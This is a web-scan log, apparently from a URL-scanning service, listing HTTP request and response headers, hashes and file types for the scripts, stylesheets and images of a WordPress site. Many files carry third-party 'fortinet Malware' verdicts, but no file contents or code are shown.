Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb8-377f-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2528
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=5.4.2
72.167.59.18 200 OK 326 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 17ebffdd326dc716de8f92678a5fcb7e
ff3aa4fe8717109673f9b5edcf6f33cdc11115b8
baed70e7105df41ac74a9ba7e64fc78a08c425002b7eb97e9a4512a63739e536
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "1561727-2db-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 326
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/dist/a11y.min.js?ver=45f739d280d1244f6cb498ed8f1bf042
72.167.59.18 200 OK 920 B URL HTTP/2 www.comm2po.ca/wp-includes/js/dist/a11y.min.js?ver=45f739d280d1244f6cb498ed8f1bf042
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (2238)
Hash 944486ddd130680c28324ee4c41efd56
fe3af023d7814f6769095c6a44123e9def4ce8ea
801a06dc7b18f26b59ed44d4c5837dc4724a3d940255c4c4673ab9c9443f543f
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/a11y.min.js?ver=45f739d280d1244f6cb498ed8f1bf042 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 24 Mar 2020 10:05:19 GMT
etag: "15811f0-8e2-5a196e39655c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 920
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/wp-embed.min.js?ver=5.4.2
72.167.59.18 200 OK 670 B URL HTTP/2 www.comm2po.ca/wp-includes/js/wp-embed.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1399)
Hash b15ce0284a10c68959ced2988f51d25a
887df7f42f5501b5b657f466a2bbd4af246035c8
f5285dc9809343aca063d97a6d02405610cea430801fa9b7feb308e35df5bbc0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/wp-embed.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021fde-59a-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 670
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.1.10
72.167.59.18 200 OK 8.2 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.1.10
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 4d22d266cebc7dda0a056d247f6ae434
f002084156a96e4c828174ef006ee2ab862daddb
c061fd379791a717cba30182f22e42cc93ebf27afa5a21545ad19264467927c3
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.1.10 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 Aug 2020 07:05:01 GMT
etag: "1560640-ceb3-5abf3c1d64140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 8159
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/animate.css?ver=1.0
72.167.59.18 200 OK 4.7 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/animate.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 3d4c3f866483be3762dbb0340bbd0795
e7ace8812ef62280495ac82e60941381efea084f
08de8369f23fd25d70a871e300a737409419b7f7fbd19cd924b6aa78ea52216f
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/animate.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0ead-127cf-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 4657
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
72.167.59.18 200 OK 1.7 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (3706)
Hash ce708dba7949c1c6e55ef607e8beec5d
dc8500e044a28c494a9eaf78d8b686664a9dcf0f
1b7bd446288d0ddaeda7126d7f8dff758665fcac36826c627975d7ae9a0354a4
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 05 Oct 2019 22:01:04 GMT
etag: "158127d-f5b-59430f471e800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1663
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/customize-base.min.js?ver=5.4.2
72.167.59.18 200 OK 2.4 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/customize-base.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (7855)
Hash 37f38d058e7c551f74100d04db538059
c3b36405cb47151f6841d26024b95fa23d4f898c
384ee0c06c709b165767b159268edb6aa4c8d38e467439c5418dc2e839e8b5be
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/customize-base.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021f9e-1ed2-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2407
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/customize-preview.min.js?ver=5.4.2
72.167.59.18 200 OK 2.9 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/customize-preview.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (10745)
Hash 3d685dfd42e7bf19b666e0faee6593c7
36ca314291e0ddf67ed89dd64287e46c4e5ff881
eae41ff1ba8c39d10b4bac02643ffc846e1a42fef2e3cc3fb278178136cc137f
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/customize-preview.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021fa8-2a1c-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2903
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/style.css?ver=1.0
72.167.59.18 200 OK 18 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/style.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash f5a6476fd6be45fbc1ddf6483b241836
c9ec74abc50c804cda96a21b3d709d60a20e7937
0cf8e2c8d778a6a260b6e25f05180ac8ddd901ab4c603cea225fa1022b60b390
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/style.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0ebb-1de4c-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 17846
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/bootstrap.min.css?ver=1.0
72.167.59.18 200 OK 16 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/bootstrap.min.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (65366)
Hash be69473425186469837cd5c5f0909d41
3458d155f61aad9d3cd08b7411b3b0fbccc16206
c22d2e34801a2131c4da355c6686c55f384c2f91310f91e1ffb89aea8021ee4a
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/bootstrap.min.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb3-18679-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 15819
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/wp-emoji-release.min.js?ver=5.4.2
72.167.59.18 200 OK 4.3 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/wp-emoji-release.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (10942)
Hash 242f4250db8f48967855d353ead37fc7
0bc81d3fc7591482418adc89c63209042238e3d6
7ac607a3bfbf598bbe5602301e93b0480eef9be74cff2821b60263195ac4eed9
GET /wp-includes/js/wp-emoji-release.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Nov 2019 22:04:02 GMT
etag: "1021fe1-364d-596a09c229880-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 4292
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1
72.167.59.18 200 OK 17 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (64614), with CRLF line terminators
Hash 7f1c6c0af2fc384371ba2034132e0210
e273077f269d6e22dd748444cd584423a7e44f13
3687b5f849fa8fbd531a80c310ef49856ca6c66c3a497cfb89aa617de0a38fa9
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614c1-fdb5-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 17426
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12
72.167.59.18 200 OK 5.3 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (19095), with no line terminators
Hash fc72056d5d16101e35afc110cc3f917b
2fc5e9c301cf3a356db2b4835c6700fc8fab4dbd
bd32dc1cad3f202d262e56bfa1a8a9307147fc42692f9237ad84479692a2ecbc
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jun 2016 20:17:33 GMT
etag: "15601ec-4a97-534b5e10cf140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 5295
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/underscore.min.js?ver=1.8.3
72.167.59.18 200 OK 5.6 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/underscore.min.js?ver=1.8.3
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (16119)
Hash 8cb73032123daada37b37b9770cad749
b9752bdf9feb2d64b6ed19448cf36260ad5b2628
43d3db04689fbd4aaa58183feb79619506636821cb9dcc09036e340bb9ae1c30
GET /wp-includes/js/underscore.min.js?ver=1.8.3 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021fcc-3f1a-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 5623
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/script.js?ver=1
72.167.59.18 200 OK 6.7 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/script.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 06bfdc6ccbfbd709b7042b4afd77767a
a04e476d2c28860447dde9e136e66abdbcde9aa5
09b2d2d1cedd46178a5a5baf41b4d157cc23ee02fc29086eeb33badb46c2fc1c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/script.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216e2-8a2c-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 6679
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4
72.167.59.18 200 OK 10 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (36155)
Hash babcd7ae42642f0ff4ba61191c73c7c8
558efb4930c8ca9399977309d058aa74baa3e4e3
ab8ce9d1179e16bfb57dc986c97ab7e7b7c72661c3a1d87d8f9b69a04484a4c0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 05 Oct 2019 22:01:04 GMT
etag: "158127e-8e1c-59430f471e800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 10492
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
72.167.59.18 200 OK 33 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (31997)
Hash 4b8dce7b06d15e6a910e80540997665e
f744242089bdfb1426969c85eabb372ddd3c9e82
81c75adb208ca49d416b19972b6e0dd772f07be5fd36a373d453db6c4ceaae46
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 17 May 2019 04:25:54 GMT
etag: "1581270-17a69-5890dc7401880-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 32866
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1
72.167.59.18 200 OK 37 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (27287), with CRLF line terminators
Hash 7a66ee54a150742d79464d1739d0f458
40ca5f13c67b9293d6989580ab1183af6a4bf559
a195c3788d26ed741e3f374b5547abe981dbae891094cb995f944387d932e307
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614c2-1afe4-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 36965
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12
72.167.59.18 200 OK 40 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (65536), with no line terminators
Hash b46a424e09b596b3fd8b72fe21f43798
c2b63763843d4cdd95beb5cebfd2d9ad7f0e0664
45c679fa19dedffcba3ddeea865b88e3760b1fb40bd26b378131591ff597c457
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jun 2016 20:17:29 GMT
etag: "1560168-6f602-534b5e0cfe840-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 39581
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2015/05/logo.png
72.167.59.18 200 OK 3.9 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2015/05/logo.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 122 x 80, 8-bit/color RGBA, non-interlaced\012- data
Hash db25e0058dc266b287f15829ec11add2
14a507f11ea5aa3877f7dbb514fbd739f2969514
6dc9ecaf7b15d9ae8598ca10ce026e20e2dc2dc3aba9cadd8c029d05d31d7619
GET /wp-content/uploads/2015/05/logo.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 20 May 2015 12:44:27 GMT
etag: "15800ac-f21-51682c99380c0"
accept-ranges: bytes
content-length: 3873
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2016/03/logoV2_grayscale.png
72.167.59.18 200 OK 4.9 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2016/03/logoV2_grayscale.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 81 x 53, 8-bit/color RGBA, non-interlaced\012- data
Hash 2a8b0c73ba75d6389d85d342a5c9da9f
5bb1162cadc3a3fd9d64d86676c5bde3414a6298
626e1d5c965260385b0c2a06649e012b8d0bde2f32bab53781badacaa606151f
GET /wp-content/uploads/2016/03/logoV2_grayscale.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 10 Mar 2016 17:26:32 GMT
etag: "15801f8-1348-52db51d922200"
accept-ranges: bytes
content-length: 4936
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=1.9.9
72.167.59.18 200 OK 25 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=1.9.9
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (511)
Hash 371eb9a7a62a67d14484c79f6cbc5fbd
221f80e355ca9a01bb3a3039df56fe7fd68dc107
2d5e8480d5bb8019cb83ad0922d6e4cc68d1de7bc075ca181bfddd20b6cd6f17
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=1.9.9 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
